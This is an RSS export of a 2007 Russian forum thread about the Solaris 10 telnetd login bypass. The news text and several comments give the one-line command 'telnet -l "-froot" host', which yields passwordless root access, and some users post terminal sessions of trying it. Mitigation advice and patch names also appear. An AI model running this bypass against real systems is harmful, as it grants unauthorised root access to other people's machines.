<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: OpenNews: Критическая проблема безопасности в telnet сервисе Solaris</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html</link>
    <description>В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций. &lt;br&gt;&lt;br&gt;&lt;br&gt;Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l &quot;-froot&quot; host. Суть в передаче аргумента опции &quot;-l&quot; программе login без проверки, login в свою очередь интерпретирует &quot;-f&quot; - как вход без запроса пароля.&lt;br&gt;&lt;br&gt;&lt;br&gt;Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.&lt;br&gt;&lt;br&gt;&lt;br&gt;Примечательно, что в 1994 году идентичная проблема &lt;br&gt;была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX.&lt;br&gt;&lt;br&gt;URL: http://blogs.securiteam.com/index.php/archives/814&lt;br&gt;Новость: http://www.opennet.ru/opennews/art.shtml?num=9842&lt;br&gt;</description>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (мимоход)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#31</link>
    <pubDate>Sat, 17 Feb 2007 16:36:14 GMT</pubDate>
    <description>что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.&lt;br&gt;&lt;br&gt;&amp;gt;Мда.... нехило &lt;br&gt;&amp;gt;&#091;root&#064;main:/&#093; #telnet -l&quot;falk&quot; 10.0.0.2 &lt;br&gt;&amp;gt;Trying 10.0.0.2... &lt;br&gt;&amp;gt;Connected to 10.0.0.2. &lt;br&gt;&amp;gt;Escape character is &apos;^&#093;&apos;. &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;SunOS 5.10 &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;Sourcing //.profile-EIS..... &lt;br&gt;&amp;gt;alk&#064;cnr1 # uname -a &lt;br&gt;&amp;gt;SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210 &lt;br&gt;&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Давно так не офигевал от Соляры.. (Квагга)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#30</link>
    <pubDate>Wed, 14 Feb 2007 19:13:54 GMT</pubDate>
    <description>А Соляра другой, простите, ни одного дня не была.&lt;br&gt;&lt;br&gt;Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.&lt;br&gt;&lt;br&gt;Отродясь это было визиткой Соляры.</description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (FSA)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#29</link>
    <pubDate>Wed, 14 Feb 2007 18:45:31 GMT</pubDate>
    <description>Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.</description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (alk)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#28</link>
    <pubDate>Wed, 14 Feb 2007 11:49:27 GMT</pubDate>
    <description>Мда.... нехило&lt;br&gt;&#091;root&#064;main:/&#093; #telnet -l&quot;falk&quot; 10.0.0.2&lt;br&gt;Trying 10.0.0.2...&lt;br&gt;Connected to 10.0.0.2.&lt;br&gt;Escape character is &apos;^&#093;&apos;.&lt;br&gt;&lt;br&gt;SunOS 5.10&lt;br&gt;&lt;br&gt;Sourcing //.profile-EIS.....&lt;br&gt;alk&#064;cnr1 # uname -a&lt;br&gt;SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#27</link>
    <pubDate>Wed, 14 Feb 2007 09:15:35 GMT</pubDate>
    <description>ISR (Interim Security Relief) patches are now available for the Solaris 10&lt;br&gt;in.telnetd vulnerability from http://sunsolve.sun.com/tpatches&lt;br&gt;&lt;br&gt; The Descriptions and readme links are currently empty, but they should be there&lt;br&gt;shortly.&lt;br&gt;&lt;br&gt; The ISR&apos;s are :&lt;br&gt;&lt;br&gt;IDR125456-01.zip  -  Solaris 10 SPARC&lt;br&gt;IDR125457-01.zip  -  Solaris 10 x86&lt;br&gt;&lt;br&gt;Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of&lt;br&gt;these patches/ISR&apos;s require a reboot and they will take effect immediately.</description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#26</link>
    <pubDate>Wed, 14 Feb 2007 08:56:42 GMT</pubDate>
    <description>telnet -l &quot;-froot&quot; 10.0.0.2 </description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (alk)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#25</link>
    <pubDate>Wed, 14 Feb 2007 08:10:04 GMT</pubDate>
    <description>что то я не понимаю ... у меня такой номер не прошел&lt;br&gt;&#091;root&#064;main:/&#093; #telnet -l&quot;froot&quot; 10.0.0.2&lt;br&gt;Trying 10.0.0.2...&lt;br&gt;Connected to 10.0.0.2.&lt;br&gt;Escape character is &apos;^&#093;&apos;.&lt;br&gt;&lt;br&gt;&lt;br&gt;SunOS 5.10&lt;br&gt;&lt;br&gt;Password:&lt;br&gt;</description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#24</link>
    <pubDate>Wed, 14 Feb 2007 04:51:24 GMT</pubDate>
    <description>Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?</description>
</item>

<item>
    <title>Критическая проблема безопасности в telnet сервисе Solaris (ламусанонимус)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/36695.html#23</link>
    <pubDate>Tue, 13 Feb 2007 21:09:34 GMT</pubDate>
    <description>&amp;gt;Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим &lt;br&gt;&amp;gt;telnet, на рутера и сервера - ssh only. &lt;br&gt;Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)</description>
</item>

</channel>
</rss>
